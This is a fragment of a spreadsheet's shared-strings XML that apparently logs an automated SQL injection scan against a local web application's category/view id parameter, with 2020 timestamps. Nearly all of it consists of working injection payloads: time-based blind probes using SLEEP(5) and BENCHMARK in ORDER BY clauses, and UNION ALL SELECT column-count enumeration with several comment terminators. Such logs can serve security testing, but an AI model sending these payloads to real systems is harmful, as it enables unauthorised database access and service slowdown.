    <t>[ ORDER BY 1,SLEEP(5),3,4-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:38 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:39 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:40 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:41 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20</t>
  </si>
  <si>
    <t>[ ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:42 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:43 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:44 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:45 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:46 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:47 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:48 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:49 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:50 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:51 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:52 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:17:53 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 1,2,3,4,5,6,7-- ]</t>
  </si>
  <si>
